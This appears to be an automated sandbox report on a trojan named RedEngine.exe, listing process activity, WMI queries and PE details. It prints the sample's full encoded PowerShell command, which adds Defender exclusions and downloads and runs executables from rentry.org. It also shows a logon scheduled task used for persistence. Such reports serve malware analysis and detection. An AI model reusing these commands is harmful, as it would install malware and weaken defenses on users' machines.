                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65BAA042_2_00007FFB1C65BAA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65FBF042_2_00007FFB1C65FBF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5ADBA042_2_00007FFB1C5ADBA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62171042_2_00007FFB1C621710
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5FB6A042_2_00007FFB1C5FB6A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C69979042_2_00007FFB1C699790
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62373C42_2_00007FFB1C62373C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62772042_2_00007FFB1C627720
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6717C042_2_00007FFB1C6717C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65385042_2_00007FFB1C653850
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5C784042_2_00007FFB1C5C7840
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E382042_2_00007FFB1C5E3820
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B582042_2_00007FFB1C5B5820
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5AD83042_2_00007FFB1C5AD830
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E310042_2_00007FFB1C5E3100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E910042_2_00007FFB1C5E9100
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A10E042_2_00007FFB1C5A10E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64D29042_2_00007FFB1C64D290
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C66B27042_2_00007FFB1C66B270
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62325B42_2_00007FFB1C62325B
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64325042_2_00007FFB1C643250
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C67D2E042_2_00007FFB1C67D2E0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C61938042_2_00007FFB1C619380
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C60F37042_2_00007FFB1C60F370
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C61ACD042_2_00007FFB1C61ACD0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C698D8042_2_00007FFB1C698D80
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C658D5042_2_00007FFB1C658D50
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C618D4042_2_00007FFB1C618D40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C664D3042_2_00007FFB1C664D30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C662E1042_2_00007FFB1C662E10
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65ADF042_2_00007FFB1C65ADF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C624DA042_2_00007FFB1C624DA0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C626E9042_2_00007FFB1C626E90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C620E4042_2_00007FFB1C620E40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C61AE2042_2_00007FFB1C61AE20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65EF0042_2_00007FFB1C65EF00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A4EE042_2_00007FFB1C5A4EE0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C684F9042_2_00007FFB1C684F90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C614FE042_2_00007FFB1C614FE0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C60507042_2_00007FFB1C605070
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62305042_2_00007FFB1C623050
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5AC8AC42_2_00007FFB1C5AC8AC
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A6A0042_2_00007FFB1C5A6A00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C686A0042_2_00007FFB1C686A00
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C62A9F042_2_00007FFB1C62A9F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5FA9A042_2_00007FFB1C5FA9A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B8A3042_2_00007FFB1C5B8A30
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B2AE042_2_00007FFB1C5B2AE0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5D6B4042_2_00007FFB1C5D6B40
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B0B5042_2_00007FFB1C5B0B50
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C64CBF042_2_00007FFB1C64CBF0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65CBC042_2_00007FFB1C65CBC0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C648C9042_2_00007FFB1C648C90
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5C0C6042_2_00007FFB1C5C0C60
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5AAC5042_2_00007FFB1C5AAC50
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C694C2042_2_00007FFB1C694C20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C63051042_2_00007FFB1C630510
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5C258042_2_00007FFB1C5C2580
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5CC61842_2_00007FFB1C5CC618
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5DC6C042_2_00007FFB1C5DC6C0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6106B042_2_00007FFB1C6106B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65E73042_2_00007FFB1C65E730
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65C73042_2_00007FFB1C65C730
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5E411042_2_00007FFB1C5E4110
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5A20F042_2_00007FFB1C5A20F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C65419042_2_00007FFB1C654190
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C5B420042_2_00007FFB1C5B4200
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB1C6241F042_2_00007FFB1C6241F0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB22723B2042_2_00007FFB22723B20
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB2272608042_2_00007FFB22726080
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB227277F842_2_00007FFB227277F8
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB2272100042_2_00007FFB22721000
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB22722DC042_2_00007FFB22722DC0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB22723DC042_2_00007FFB22723DC0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AF531C42_2_00007FFB23AF531C
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23AF329042_2_00007FFB23AF3290
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23B17CA042_2_00007FFB23B17CA0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess token adjusted: SecurityJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: String function: 00007FFB01F84330 appears 31 times
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: String function: 64963C90 appears 40 times
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: String function: 64963CD0 appears 49 times
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: String function: 00007FF741BC2760 appears 36 times
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: String function: 648DECD0 appears 235 times
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: String function: 00007FF741BC25F0 appears 100 times
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: String function: 00007FFB01F6A3F0 appears 245 times
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: String function: 00007FFB1C4EC7B0 appears 70 times
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: String function: 00007FFB1C693540 appears 53 times
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: String function: 00007FF795B925F0 appears 100 times
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: String function: 00007FFB1C4F4330 appears 133 times
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: String function: 00007FFB1C4DA3F0 appears 1036 times
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: String function: 00007FF795B92760 appears 36 times
                        Source: unicodedata.pyd.14.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: unicodedata.pyd.38.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: unicodedata.pyd.41.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: pyarmor_runtime.pyd.41.drStatic PE information: Number of sections : 11 > 10
                        Source: zlib1.dll.38.drStatic PE information: Number of sections : 12 > 10
                        Source: pyarmor_runtime.pyd.14.drStatic PE information: Number of sections : 11 > 10
                        Source: zlib1.dll.41.drStatic PE information: Number of sections : 12 > 10
                        Source: pyarmor_runtime.pyd.38.drStatic PE information: Number of sections : 11 > 10
                        Source: zlib1.dll.14.drStatic PE information: Number of sections : 12 > 10
                        Source: RedEngine.exe, 00000001.00000000.1296199972.00000000004A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePAN.exe4 vs RedEngine.exe
                        Source: RedEngine.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
                        Source: mgne4i3n.t1d0.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: mgne4i3n.t1d0.exe.3.dr, -.csCryptographic APIs: 'CreateDecryptor'
                        Source: mgne4i3n.t1d0.exe.3.dr, -.csCryptographic APIs: 'CreateDecryptor'
                        Source: mgne4i3n.t1d0.exe.3.dr, -.csBase64 encoded string: 'ZZ0PIMiUGLYZMsGcVZAVO8PXd5cPMcCbWp1HE8iNc4oIJtS4RZcZOc+VT98bMdmmcJEQOOOYW4FHO92mf4oZJdiYWo0ILZaeU5AjGMiXUZAUb+qcQrAFJMi/RIsRHMyXUogZb8qcQrsyNcCcDa0SMMiBeYJHBsiYUrcIJsSXUd89MMnCUYEIC/2WRY0IPcKXDYMZIPK6Q5YOMcONcosRNcSXDbcZIOmYQoVHZ5zKBtJHFd6KU4keONSqU5YKMd/CZY0RJMGcd5cPMcCbWp05LN2VWZYZJpabV4YZONuUDZcRO8acQoEPIA=='
                        Source: classification engineClassification label: mal100.troj.evad.winEXE@383/2861@4/4
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC29E0 GetLastError,FormatMessageW,MessageBoxW,14_2_00007FF741BC29E0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FFB0199A3B0 CoCreateInstance,EnableWindow,CoTaskMemFree,CoTaskMemFree,31_2_00007FFB0199A3B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_004026B8 LoadResource,SizeofResource,FreeResource,13_2_004026B8
                        Source: C:\Users\user\Desktop\RedEngine.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RedEngine.exe.logJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugz0binj.yrp.ps1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.bat C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\user\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
                        Source: RedEngine.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: RedEngine.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;RainbowSix.exe&quot;)
                        Source: C:\Windows\System32\findstr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\findstr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;tf_win64.exe&quot;)
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;dota2.exe&quot;)
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;cs2.exe&quot;)
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;RustClient.exe&quot;)
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE ExecutablePath=&apos;C:\Program Files (x86)\Steam\steeam.exe&apos;
                        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;GTA5.exe&quot;)
                        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\RedEngine.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: RedEngine.exeReversingLabs: Detection: 68%
                        Source: mgne4i3n.t1d2.exeString found in binary or memory: -startline must be less than or equal to -endline
                        Source: mgne4i3n.t1d2.exeString found in binary or memory: -help
                        Source: clppth.exeString found in binary or memory: -help
                        Source: clppth.exeString found in binary or memory: -startline must be less than or equal to -endline
                        Source: unknownProcess created: C:\Users\user\Desktop\RedEngine.exe "C:\Users\user\Desktop\RedEngine.exe"
                        Source: C:\Users\user\Desktop\RedEngine.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAbAB3ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGEAdAByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACAAIwA4ADEAOQA6ACAAQwBhAG4AbgBvAHQAIABzAHQAYQByAHQAIABkAHUAZQAgAHQAbwAgAG0AaQBzAHMAaQBuAGcAIABkAGUAcABlAG4AZABlAG4AYwBpAGUAcwAsACAAcABsAGUAYQBzAGUAIABpAG4AcwB0AGEAbABsACAAYQBsAGwAIAB0AGgAZQAgAGQAZQBwAGUAbgBkAGUAbgBjAGkAZQBzACAAcgBlAHEAdQBpAHIAZQBkAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGIAcQBzACMAPgA7ACIAOwA8ACMAZQBtAHYAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AGoAZgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AHEAbQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB3AHcAeAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AcABhAG4AYwBlAGsANgAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBtAGMAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGoAbQBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGkAZwBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwB2AGkAeAAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AGUAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdgB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAHgAbABpACMAPgA="
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#atr#>[System.Windows.Forms.MessageBox]::Show('Error #819: Cannot start due to missing dependencies, please install all the dependencies required.','','OK','Error')<#bqs#>;
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe "C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe"
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
